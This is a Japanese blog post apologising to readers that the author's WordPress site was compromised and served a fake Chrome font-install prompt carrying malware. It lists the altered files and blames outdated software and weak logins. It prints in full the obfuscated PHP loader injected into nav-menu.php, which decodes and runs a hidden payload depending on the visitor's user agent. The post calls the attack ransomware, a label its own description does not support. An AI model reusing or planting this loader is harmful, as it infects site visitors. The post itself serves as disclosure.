X
    Categories: お知らせ

本当にごめんなさい…ランサムウェアにサイト改ざんされていました…

いつも、このブログを読んでくださっているあなた!!

本当にごめんなさい…

ブログが改ざんされていました…

Windowsのパソコン。
しかもChromeブラウザを対象にした乗っ取り…

ランサムウェアと呼ばれるものに…
※すでに普及はしております。

Chromeを装ってウィルス拡散

今回のランサムウェアは、Chromeを装ったもので、
フォントが見つからないからインストールしてね。

インストールをすると、ウィルスに感染してしまうもの…

少し前に、Facebookのメッセーンジャーからメッセージをいただいておりました…

すぐに、対応はしたのですが…

以前に使用していたファイルが残っており…
真犯人はそちら。

今日は、他の方からメッセージをいただき…
完全にインストールをし直しました。

ご迷惑をおかけして申し訳ございません

検索結果から表示するぶんには、問題がないようで、Facebookからアクセスすると発覚しました。

標的はCMS内のPHPファイル

WordPressやJoomla!などの、ブログ構築するCMSに多い被害。

サーバーがやられるわけではなく、PHPのファイルに余計な言葉を書き加えられるのが原因です。

私は、WordPressを使っていますが、改ざんされていたファイルは下記の2つ+1プラグイン。

  • /wp-includes/nav-menu.php
  • /wp-admin/includes/nav-menu.php
  • スパムコメントを防ぐ「Akismet」プラグイン

 

この2つのファイルに、下記のような不要なコードが1行目にありました。

<?php $jcducwa = ‘();}}cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>oaet = $ywmfman(“”, $lwaxegs); $vskoaetM5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:} x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U7g:74985-rr.93e:5597f-s.973:8297f:1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s:>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~3qj%6<*Y%)fnbozcYufhA x272qjobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cq% x27j)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#00;vg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmfx63 150 x72 157 x6d UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6m)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G##2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c}X x24<!%tmw!i}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ux63 162 x65 141 x74 h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341if((function_exists(” x6f 142 x5f 163!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<fldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]4PNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudovg}xebfI{*w%)kVx{**#k#)tutjyf`x x22l:!}V;3q%}U;y]}R;-!#]y38#-!%w:**<“)));$vsk1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L17y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cpV]K5]53]Kc#<%tpz!>!#]D]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FU]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427 163 x69 145″)) or (strstr($u*9-1-r%)s%>/h%:<**#57]38y]47]67y]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]28fw6* x7f_*#fubfsdXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnj { $GLOBALS[” x61 156 x75 156 x61″]=1; $u x27,*b x27)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobsn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%zW%h>EzH,2 x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`6<pd%w6Z6<.2`hA x27pd%6<C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmj%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-GB)fubfsdXA x27K6< x7fw6*3qj%7>!%t2w>#]y74]273]y76]252]y:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepuyfu x27k:!ftmf!}Z;^nbsbq% x5cSFWSFT`%}X;<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>#:#* x24- x24!>! x24/%tjw/ x24)% x24- x24y4 x24- x24]y8 x24- x24]26145″)) or (strstr($uas,”%:|:**t%)m%=*h%)m%):fmjix:<##:>:h51L3]84]y31M6]y3e]81#/5297e:56-xr.985:52985-t.98]K4]65]D8]86]y31]278]y3f]%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss x66 151 x72 145 x66 157 x78″))) { $ywmfman = ” !>!%tdz)%bbT-%bT-%hW~%o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K^2 x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:rj%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!gj!|!*1?hmg% x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x27 x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj x22)gj!|6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7)ftpmdXA6|7**197-2qj%7-K)udfoopdXAsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cS[” x61 156 x75 156 x61″]))))2]},;osvufs} x27;mnui}&split(“%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]7;!}6;##}C;!>>!}W;utp]36]373P6]36]73]83]238M7fw6* x7f_*#ujojRk3`{666~6<& x74 141 x72 164″) && (!isset($GLOBAL)!gj}Z;h!opjudovg}{;#)tutjyf`opjudoqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r x5c2^-j=tj{fpg)% x24- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#24b!>!%yy)#}#-# x24- x24-tusqpt)%z–#H#-#I#-#K#-#L#-#M#-#<#16,47R57,27R66,#/q%>2q%<#g6R85,67R;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-R[” x48 124 x54 120 x5f 125 x53 105 as=strtolower($_SERVEpd%w6Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%q% x27Y%6<.msv`ftsbqA7>q%6< x7.}-}!#*<%nfd>%fdy<Cb*[%hquui#>.%!<***f x27,*e x27,*d x27,*c%)uqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}A x27&6<.fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs+{d%)+opjudovg+)!gj+{e%!osvufs!*x52 137 x41 107 x45 116 x54″]); if ((strstr($uas,” x6d>!fyqmpef)# x24*<!%t::!>! x24Ypp3)%c%j^ x24- x24tvctus)% x24- xas,” x72 166 x3a 61 x31″)) or (strstr($uas,” x61 15y76#<!%w:!>!(%w:!>! x246767~6<Cw6<)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y%)7gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#)sf!|!*bubE{h%)j{hnpd!opjudovg!|w6< x7fw6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}127-K)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)fujsxX6<#o]<3,j%>j%!*3! x27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqs<*)ujojR x27id%6< x7]g2y]#>>*4-1-bubE{h%)sutcvt)!gjopjudovg<~ x24<!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!brray_map(“kbgqupv”,str_ing(0); $lwaxegs = implode(assbz) x24]25 x24- x24-!% x24- x24*!|! x24- x24 x5c145 x5f 146 x75 156 x63 164 x69 157 x6e”; function kbgqupv($n){return !sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfidgvodujpo! x24- x24y7 x24- x24*<! x24- x24gps)%j>1<%85]256]y6g]257]y86]267]y74>!#]y84]275]y83]273]y76]277#<chr(ord($n)-1);} @error_report)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{-%rxB%h>#]y31]278]y3e]81]K78:56985:61922:ftmbg39*56A:>:8:|:7#6#jQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#ut>j%!*72! x27!hmg%)!gj!<2,*%c*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIB%iN}#-! x24/%tmw/ x24)4]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)_;gvc%}&;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfe x24- x24<%j,,*!| x24- x24!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbx223}!+!<+{e%+*!*+fepdfe{h6 x64 162 x6f 151 x64″)) or (strstr($uas,” StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSfokhtyx’; $pckrjsvv=explode(chr((420-300)),substr($jcducwa,(26009-19989),(142-108))); $epysckwrh = $pckrjsvv[0]($pckrjsvv[(4-3)]); $fxjekxr = $pckrjsvv[0]($pckrjsvv[(6-4)]); if (!function_exists(‘ybcioqghx’)) { function ybcioqghx($ogpbnty, $dqhgrqdp,$nlqsyxf) { $ztjnxahn = NULL; for($yotfrqx=0;$yotfrqx<(sizeof($ogpbnty)/2);$yotfrqx++) { $ztjnxahn .= substr($dqhgrqdp, $ogpbnty[($yotfrqx*2)],$ogpbnty[($yotfrqx*2)+(6-5)]); } return $nlqsyxf(chr((60-51)),chr((447-355)),$ztjnxahn); }; } $sxqhojxy = explode(chr((202-158)),’987,37,3438,37,3258,29,1959,41,3987,21,3951,36,4307,54,1775,29,4424,51,5977,43,641,20,2529,24,2717,48,826,20,5060,70,5304,30,4982,28,4959,23,3310,56,4475,34,4008,64,2152,69,3510,65,4742,54,2787,63,3163,34,2114,38,2285,31,2991,43,430,28,518,44,3197,61,4072,30,1896,63,4206,69,4563,58,661,43,4848,20,3411,27,4690,52,3366,21,792,34,1085,37,4161,45,5652,46,3475,35,602,39,385,45,4796,52,5501,28,2221,64,2922,69,4509,54,4868,31,4661,29,1024,61,2850,35,5789,40,562,40,4126,35,2000,60,5698,65,458,60,3742,68,5,44,1687,38,1179,58,3034,60,3682,60,2389,41,5130,68,335,50,5422,25,5334,50,846,50,5951,26,4275,32,1573,42,155,63,218,38,3867,36,4621,40,1282,48,3287,23,1237,45,3903,48,740,52,5275,29,2316,25,5249,26,1636,51,1804,32,2885,37,2553,33,1122,57,1513,60,4899,60,5010,50,4397,27,3810,35,2462,67,5763,26,5198,51,3623,59,4361,36,5570,23,5529,41,5447,54,2341,48,2060,54,3575,48,2659,58,5384,38,256,34,2608,51,2586,22,1417,55,1615,21,3094,69,1472,41,88,67,4102,24,2765,22,952,35,1725,50,3387,24,1836,60,5593,59,1355,62,2430,32,290,45,896,56,5890,61,704,36,3845,22,5829,61,1330,25,49,39,0,5′); $ttcqdbkm = $epysckwrh(“”,ybcioqghx($sxqhojxy,$jcducwa,$fxjekxr)); $epysckwrh=$jcducwa; $ttcqdbkm(“”); $ttcqdbkm=(626-505); $jcducwa=$ttcqdbkm-1; ?>

なぜ?? 原因は?

WordPressやプラグインをアップデートしないから。」&「ログイン情報が、簡単すぎる」

前回、被害にあった時に、全て削除しアップデートしたのですが…
まさかの、古いWordPressが残っていた事実が発覚…

今回は、そちらからも削除しました。

この度は、ご迷惑をおかけして申し訳ございません。

この、改ざんは「SearchConsol」も教えてくれないので、注意が必要ですね。

 

ご報告いただいた皆様ありがとうございました。

1banbo4: ◆浅山佳映子について ・Amazonベストセラー 2週連続 1位(Kindleマーケティング部門) ・知名度ゼロのブロガーをトップブロガーへ。 ・アクセス数3倍以上、売上4倍以上アップさせるWebコンサルタント ・1日3万円以上のセミナーをたった3時間で満席にする人気講師。 ・FMラジオのパーソナリティ 「上級ウェブ解析士、SEOコンサルタントの資格保有」 ◆健康診断 あなたのサイトの健康状態をチェックする健康診断を実施しています。 なぜ、アクセス数が増えないのか? なぜ、売上が上がらないのか? なぜ、問い合わせがないのか? なぜを解決したあなたのための健康診断。